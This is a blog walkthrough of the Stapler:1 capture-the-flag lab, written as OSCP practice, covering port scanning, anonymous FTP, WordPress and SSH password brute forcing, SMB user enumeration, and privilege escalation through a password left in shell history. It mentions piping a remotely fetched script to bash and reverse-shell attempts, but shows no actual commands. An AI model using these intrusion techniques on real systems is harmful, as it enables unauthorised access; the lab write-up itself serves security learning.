Sat. Oct 24th, 2020

Pentesting Fun Stuff

following the cyber security path…

Stapler: 1

This is another challenge from my OSCP list. It is a challenge from 2016 and this is from its description:

Let’s start…..

Recon

What ports are open and what services are running?

That’s a long list of ports and services. At first glance there is an FTP server with anonymous login enabled.
There are also 2 webservers, a samba server and a MySQL server running.
Finally there is also something returning output on port 666.

If you can’t remember the default service running on a port, you can check a list on Linux for the specific port/service.
As an example, I’m going to check out port 3306.

FTP

Anonymous login is enable, so let’s see what is inside.

Collected a possible username: harry
But what banner?

No password yet, so moving on.

Two more possible usernames: elly and john.
The usernames, I put into a list for later use.

Port 666

When connecting with port 666 it returns unreadable output which I redirect into a file.

A zip file.

Another possible username. The message about segmentation fault could suggest a buffer overflow.

It looks like there is some useful meta-data inside this picture. Getting a cookie? Ok.

Webservers

I thought I would get a cookie when browsing the website at port 12380, but no cookie.
There are some comments in the source page.

More usernames for the file.
My directory brute force attempts came up empty. So maybe Nikto has better luck.

These scans look promising. In the first one there is a file found that resides in the home folder of a user. So maybe LFI possibilities.
The second scan shows the existence of a robots.txt file, which has 2 entries. Also, there is a phpmyadmin page and there is an SSL certificate with some useful information.

It seems I checked out HTTP, but forgot HTTPS. When browsing to /admin112233/ I get a pop-up.

The blogblog takes me to a wordpress site and I navigate to the wp-admin page.

So there is a john user, but the password is just not correct. Time for wpscan.
With the use of wpscan in this case it’s important to note that the option --disable-tls-checks is very important.
Without the option the scan will abort because of the certificate.

The scan says the current WordPress runs on version 4.2.1. And this version has some vulnerabilities.
I also got some valid credentials. So that was something I wanted to investigate first, as it’s relatively easy.

For brute forcing the passwords I used a password list from SecLists.
I tried Harry first, but this user has no useful rights. So I try Tim next.

Tim has the same rights, so does Kathy. They can’t do anything without it first needs to be approved by the admin…….and it looks like that is John.

To get a reverse shell there are several ways to get this done. But in this case it wasn’t that simple. What did I try:

  • altering the 404 page by replacing the php code with the code from pentestmonkey. This didn’t work because the files weren’t writable.

  • installing a plugin. This also did not work, because I needed to give the FTP credentials.

After some time I decided to move on to another service, because there was much more to go on. Maybe I would find something useful along the way.

SMB

Because connecting to the MySQL server needs a password I go for the SMB server.

Another option that Kali has to enumerate an SMB server is a perl script named enum4linux. This script has many option, but for now I’m going to enumerate users via RID cycling.

Now to filter out the usernames and store them in the usernames.txt file.

After checking the list, it seems that I have duplicates.

From the scans it looks like the tmp share is writable, but let’s try the Kathy share first.

From this share I get 3 files

Now for the tmp share.

An ASCII file with a listing of a filesystem. From here I can’t really do anything with it.

UDP

Because of the use of FTP in this challenge I decided to check another angle.

Nmap is not sure. We can try it anyway.

Cool. Let’s see if we can upload a file.

Unfortunately the script wasn’t anywhere to be found.

SSH

I really don’t like brute forcing, mostly because it can take a very long time and it is very noisy.
But in this case I give it a shot.

And this is why I don’t like brute forcing. Before I found these credentials I tried several lists from SecLists first and then the rockyou list.
When that didn’t work I almost gave up on this option and only as a last attempt I used the info I found during this pentest, which was more luck than wisdom.

EoP

Let’s start with some basic enumeration.
Starting a python http server on port 80, while in the folder containing a recon bash script.

Then curling it on the remote system and piping it to bash.
This way the script will run on the remote system without the need to transfer the file first.

It looks like Peter is the user of interest. And from the history of JKanode it looks like I have his password.

Well….that’s nice.

And that’s the flag.

Conclusion

This was definitely a good practice to work your way through a system step by step.
Because of the many possibilities this challenge offered to get access, I found it odd that there were so many rabbit holes that turned out to be nothing and at the end a simple SSH brute force did the trick.

To compare notes I read a few walkthroughs from others that did the same challenge and with some there were different outcomes with wordpress for example.
The uploading of the plugin was no problem and there was no mentioning about FTP credentials.

Anyhow….I really liked this challenge and I would recommend it for anyone who is trying to learn more about pentesting.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.